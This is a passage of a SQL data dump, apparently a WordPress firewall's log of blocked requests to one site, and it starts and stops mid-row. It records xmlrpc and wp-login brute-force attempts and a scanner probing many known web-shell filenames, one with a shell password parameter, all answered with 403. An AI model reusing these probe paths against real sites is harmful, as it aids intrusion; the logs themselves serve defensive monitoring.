Firefox\\/96\"}','2jKgCHGyNnME1IOQbelAukrq',0,1664559998.4862,1945,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FuRTrtLIApc5M0nmqlNwovbg',0,1664560185.1446,1269,'','POST',403,0,515,0,1,'',0),('154.0.165.146',2583733650,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SgjnA3xyTzr6eYBLH8JXhQoC',0,1664560420.7471,1289,'','POST',403,0,515,0,1,'',0),('50.59.99.98',842752866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fhl9j8byxueTQCK3OVwIB07d',0,1664560617.2954,18240,'','POST',403,0,515,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MeJgQXdScv9ajwnt1zRsTqFm',0,1664560851.8996,1397,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aYiUpxgVEulJZeFh2K3InByT',0,1664561318.6895,1330,'','POST',403,0,515,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7IkNV35EGRBcboM2PtguJhYj',0,1664561502.7874,17714,'','POST',403,0,515,0,1,'',0),('149.129.181.108',2508305772,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dOpPcMqzmne7Sa20h9F6Q8Lb',0,1664561753.6603,18710,'','POST',403,0,515,0,1,'',0),('87.106.228.6',1466622982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lodHwScuC08XqeOxvtiZrNkm',0,1664561937.4659,12054,'','POST',403,0,515,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/about.php','','{\"1\":\"python-requests\\/2.27.1\"}','SvfuWgL2FCTbydhmJGz1rxlw',0,1664561968.4989,336,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/upload.php?mr=exe3','','{\"1\":\"python-requests\\/2.27.1\"}','7w8BNdtnhvFlyHM9VRP3UeW4',0,1664561969.4094,292,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/2index.php','','{\"1\":\"python-requests\\/2.27.1\"}','0OrxZc9fbadoITMAkK1SJwhU',0,1664561970.5980,288,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/C.php','','{\"1\":\"python-requests\\/2.27.1\"}','bXmRvNV780n3kHqKtge59JSL',0,1664561971.7735,350,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/c.php','','{\"1\":\"python-requests\\/2.27.1\"}','oKjivB3OzPVCufFU6e5hlDwn',0,1664561973.0199,332,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/01.php','','{\"1\":\"python-requests\\/2.27.1\"}','jE2mr9VFoPghDiO8NISZYwJq',0,1664561974.9412,350,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/1.php','','{\"1\":\"python-requests\\/2.27.1\"}','gym1bjYAUcsMqF8xdGNCo7J6',0,1664561976.2858,345,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/02.php','','{\"1\":\"python-requests\\/2.27.1\"}','szkOiGEcjt1lQUmLdyVYeApT',0,1664561977.2730,364,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp.php','','{\"1\":\"python-requests\\/2.27.1\"}','mTA8PbfBCqv2VKlnNRODxEp5',0,1664561978.2042,306,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/fw.php','','{\"1\":\"python-requests\\/2.27.1\"}','DNcmCLa1zqSIKhf6yXxZ4kF8',0,1664561979.0767,298,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/alfa.php','','{\"1\":\"python-requests\\/2.27.1\"}','mQGYfS9gac5FukzsV2vMJI4t',0,1664561980.0914,311,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','uUDy0mM3kXTR4EZGtYr2F81n',0,1664561981.0631,283,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/x.php','','{\"1\":\"python-requests\\/2.27.1\"}','RVbKn5rLcwPYDIkmsOjEpq7x',0,1664561982.0977,362,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/404.php','','{\"1\":\"python-requests\\/2.27.1\"}','gOiZQYeqTj4ltX8Cf3Jd6EWR',0,1664561983.3490,301,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/403.php','','{\"1\":\"python-requests\\/2.27.1\"}','ShszP83Rb4eQL2E5Mno9mqgV',0,1664561984.3217,301,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','X2b0Lxn7SF4ri51djBvgsYGk',0,1664561985.2104,286,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/admin.php','','{\"1\":\"python-requests\\/2.27.1\"}','yDT71kiqYLJx6H5pdznurelK',0,1664561986.0866,394,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-22.php','','{\"1\":\"python-requests\\/2.27.1\"}','QuiVs6mY5GLxfogJU8wp0drk',0,1664561987.3482,300,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/1index.php','','{\"1\":\"python-requests\\/2.27.1\"}','9pTX7QSNjvhmHsgR3fGtYnWU',0,1664561988.3289,296,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/marijuana.php','','{\"1\":\"python-requests\\/2.27.1\"}','QzkbTi72agC1joqFV8puLwHS',0,1664561989.3395,315,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/good.php','','{\"1\":\"python-requests\\/2.27.1\"}','sNnmbTpVCKo9YUxDQlLME74G',0,1664561990.4009,291,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','7in4fkUYyL0IDZprEo1JRlwt',0,1664561991.4466,320,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/doc.php','','{\"1\":\"python-requests\\/2.27.1\"}','gkL5BvMSFcdUETjuOZAPW4r2',0,1664561992.5420,291,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp.php','','{\"1\":\"python-requests\\/2.27.1\"}','KBWvh2ikOGcaXF14MLzymDgA',0,1664561993.6336,305,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/radio.php','','{\"1\":\"python-requests\\/2.27.1\"}','825QuvmcSVJh1XNWqrkZPRIo',0,1664561994.6272,290,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-includes/1index.php','','{\"1\":\"python-requests\\/2.27.1\"}','EBKrQNZexPA3ugIpotcajX6S',0,1664561995.5574,353,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"python-requests\\/2.27.1\"}','udNicAo2JkhtKp6mT9nrw8vg',0,1664561996.5110,288,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.27.1\"}','EYho9iTLOCKWFJGIgnpfyzUX',0,1664561997.4240,339,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/2index.php','','{\"1\":\"python-requests\\/2.27.1\"}','zbRyFsP3JfQEHevYxT5h0ZU7',0,1664561998.4280,295,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/autoload_classmap.php','','{\"1\":\"python-requests\\/2.27.1\"}','7dcUZt12FiGjRSM6p9mL3bNo',0,1664561999.3482,283,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp.php','','{\"1\":\"python-requests\\/2.27.1\"}','yZEBqRewDJ8CTgzIWLnNSO40',0,1664562000.5002,283,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wikindex.php','','{\"1\":\"python-requests\\/2.27.1\"}','M05xFC4skcSXoObn2pRaKNGA',0,1664562001.3746,324,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"python-requests\\/2.27.1\"}','3lMyWUtX6zeAc4xoaC712VhE',0,1664562002.7072,519,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-2019.php','','{\"1\":\"python-requests\\/2.27.1\"}','bq3yVjsWPvR42NktlQpBewhi',0,1664562004.0122,352,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/1h6j5.php','','{\"1\":\"python-requests\\/2.27.1\"}','HmGaYl1pizPfU87kg5K9jZIs',0,1664562005.0472,334,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-admin/xleet.php','','{\"1\":\"python-requests\\/2.27.1\"}','jY8BrgfM2eykGXQhHwxVaDF9',0,1664562007.1719,330,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-content/fw.php','','{\"1\":\"python-requests\\/2.27.1\"}','TNBxLmHPgpzIsvcK4eEaAjZt',0,1664562008.1498,288,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-admin/fx.php','','{\"1\":\"python-requests\\/2.27.1\"}','yocvpeLwsg64AIEVZnh75PHb',0,1664562009.2216,324,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/4price.php','','{\"1\":\"python-requests\\/2.27.1\"}','eHoBsqNmcWkV4jJv7xQwDGRL',0,1664562010.1409,283,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','NSL3eViMEfz9cqosYxRB58tr',0,1664562011.6550,296,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/utchiha.php','','{\"1\":\"python-requests\\/2.27.1\"}','mv0oqL7DhpBEXd1VbgIak5s6',0,1664562012.6733,331,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-admin/priv8.php','','{\"1\":\"python-requests\\/2.27.1\"}','RJ0b3P95rm1LFEH67SCBeWIl',0,1664562013.7382,300,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/wp-admin/rss.php','','{\"1\":\"python-requests\\/2.27.1\"}','gB3InUyuWxqX20pVkFvRNrh1',0,1664562014.8856,284,'','GET',403,0,700,0,1,'',0),('212.192.246.33',3569415713,'','http://cteisys.com/uploads/xleet.php','','{\"1\":\"python-requests\\/2.27.1\"}','uYWAanJEU2d1CXQM835PZtDk',0,1664562015.8245,282,'','GET',403,0,700,0,1,'',0),('37.120.132.83',628655187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','p7PkiJ8vFsAgab3dDIz0Lm25',0,1664562234.4691,2764,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oP2MIp84LEvFtJ0yWOnzbl6U',0,1664562630.7318,18515,'','POST',403,0,515,0,1,'',0),('195.211.45.155',3285396891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w5f7en9qdHKahPkbcj6AZO0V',0,1664562815.3328,18250,'','POST',403,0,515,0,1,'',0),('184.154.69.85',3097118037,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','H9VJWSuhkaNfycP8dir20Isq',0,1664563073.5226,18581,'','POST',403,0,515,0,1,'',0),('47.104.66.61',795361853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xylJiDLYztPdsKu2ROArU5WE',0,1664563282.3104,18348,'','POST',403,0,515,0,1,'',0),('217.21.74.42',3642051114,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Wb4uXy1OBALIGgsYZvc0NkVd',0,1664563337.1175,983,'','POST',403,0,600,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','CpEyLOAu9kHQ0vqStrzX34ie',0,1664563337.7038,1314,'','POST',403,0,600,0,1,'',0),('59.110.33.253',997073405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','AuzGlM6mBpx04sH8vR2jhP3E',0,1664563338.3153,903,'','POST',403,0,600,0,1,'',0),('216.250.116.85',3640292437,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','JGQedBuLf3rAqIvi8W9So1kT',0,1664563347.4875,535,'','POST',403,0,600,0,1,'',0),('47.242.115.115',804418419,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','qdwuZh3oig5lAOzbHLe78jVC',0,1664563352.4531,460,'','POST',403,0,600,0,1,'',0),('185.107.113.246',3110826486,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','PYcF28TURDyGvMrE147ftxph',0,1664563358.8359,589,'','POST',403,0,600,0,1,'',0),('89.184.155.89',1505270617,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','YRs3mEDjBJMoZzivlIfynCtN',0,1664563359.5482,551,'','POST',403,0,600,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','ZUgizbWlKBTrPsf7qxd3Sm05',0,1664563362.9261,516,'','POST',403,0,600,0,1,'',0),('171.244.21.74',2884900170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','cGuL2g6VKqk9NoYSAfOPlWzn',0,1664563505.9623,18742,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1QoTH2mkBgzMCrpLOjUJhl7I',0,1664564163.2195,19002,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G8petuBjCEomJXgFLhlbZPqW',0,1664564404.4806,19107,'','POST',403,0,515,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5vsVo7YU1wKQX9Rpe04CrycF',0,1664564597.7182,18447,'','POST',403,0,515,0,1,'',0),('184.154.69.85',3097118037,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EXOtePLV9y3678drbFWIgiTY',0,1664564843.6215,18824,'','POST',403,0,515,0,1,'',0),('61.12.67.132',1024213892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lyd9cMJuYVxIwLhQB4Gvn5NH',0,1664565279.7797,18974,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xe2KitXrCTGMkljPfgQyVW0L',0,1664565471.2783,18397,'','POST',403,0,515,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2Kmq7l5g3IQSp0M9sa6G8k4T',0,1664565723.8915,18680,'','POST',403,0,515,0,1,'',0),('103.154.184.152',1738193048,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8t1yoCa0bDPTL7zVElrKWxYs',0,1664565924.6318,18383,'','POST',403,0,515,0,1,'',0),('139.99.69.189',2338538941,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','f0CKoGEQ1rOxmqvVITclHLUD',0,1664566390.3641,18531,'','POST',403,0,515,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AJZOdIbP5Ck4so7aWvSpXjN1',0,1664566627.5873,18507,'','POST',403,0,515,0,1,'',0),('104.131.189.63',1753464127,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SP08ZuROWrgkz6NBpcCidlsa',0,1664566837.3491,18983,'','POST',403,0,515,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GlJ5jzWxpugndKfqFX96k3Qv',0,1664567085.1852,18397,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','A1QNDTsudrq6gB5MXFZmwc7p',0,1664567562.4882,18453,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','QtREjdch5G7KmwLBZTIV1FNe',0,1664567684.2849,508,'','POST',403,0,600,0,1,'',0),('128.127.106.229',2155834085,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Nc4Bh3kTv6Van5GeH1QIf9ZK',0,1664567685.0841,500,'','POST',403,0,600,0,1,'',0),('115.165.166.192',1940235968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','McafxN6Z58SDVowmzhL7sWJl',0,1664567691.4431,644,'','POST',403,0,600,0,1,'',0),('171.244.15.68',2884898628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Oxdlh7FZEo08pNmv6TJaIGPt',0,1664567692.2207,585,'','POST',403,0,600,0,1,'',0),('43.252.230.8',737994248,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','SJsWM7tkyGxTLEKv9pB32UZQ',0,1664567700.6121,490,'','POST',403,0,600,0,1,'',0),('115.165.166.192',1940235968,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','IzD9shdajeF8icS7BV3YNLXl',0,1664567709.6513,1077,'','POST',403,0,600,0,1,'',0),('81.88.52.216',1364735192,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','qsnFUbyOTc0zSt8l79mZYjCE',0,1664567710.0831,843,'','POST',403,0,600,0,1,'',0),('89.233.5.168',1508443560,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','dNoamWpyPBQbq7Y9seTXRiJr',0,1664567720.0198,520,'','POST',403,0,600,0,1,'',0),('208.67.104.40',3494078504,'','http://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','A0BhjVg2zrP7yQSGOka1ebFs',0,1664567727.5507,325,'','GET',403,0,700,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','ywgMhUI60ZX572QfjiHVD1Ev',0,1664567737.5537,469,'','POST',403,0,600,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CR9Q71IbSEpLDXo2KH8YBvla',0,1664567750.4028,1225,'','POST',403,0,515,0,1,'',0),('208.67.104.40',3494078504,'','http://cteisys.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','y12J0xNtuCe7hHGMfXs9vcFr',0,1664567753.1173,304,'','GET',403,0,700,0,1,'',0),('208.67.104.40',3494078504,'','http://cteisys.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','JSqNU2H6ouPLj0etMwmGgB1Z',0,1664567779.0818,289,'','GET',403,0,700,0,1,'',0),('208.67.104.40',3494078504,'','http://cteisys.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ucObPMkUaq7Q3VBe0NyZ8pAr',0,1664567836.2137,290,'','GET',403,0,700,0,1,'',0),('208.67.104.40',3494078504,'','http://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','5NR73Sae2EmQzydV6lvuH8FJ',0,1664567847.9223,9683,'','GET',403,0,700,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wJbWvOAL3KXCxrunEYe25lRV',0,1664568219.4327,18926,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hqSW8if2TR3UyXYCOt51aMIQ',0,1664568498.3397,1592,'','POST',403,0,515,0,1,'',0),('167.71.216.37',2806503461,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wQH7Re9ublFjYvL0aSAhmqO3',0,1664568689.0043,1422,'','POST',403,0,515,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RCjw0AaL6dNsKDc3kgZpWPv8',0,1664568962.5208,1521,'','POST',403,0,515,0,1,'',0),('172.105.42.19',2892573203,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3mDa07gU1iNA8jwMoBxSvkdc',0,1664569177.1726,1292,'','POST',403,0,515,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 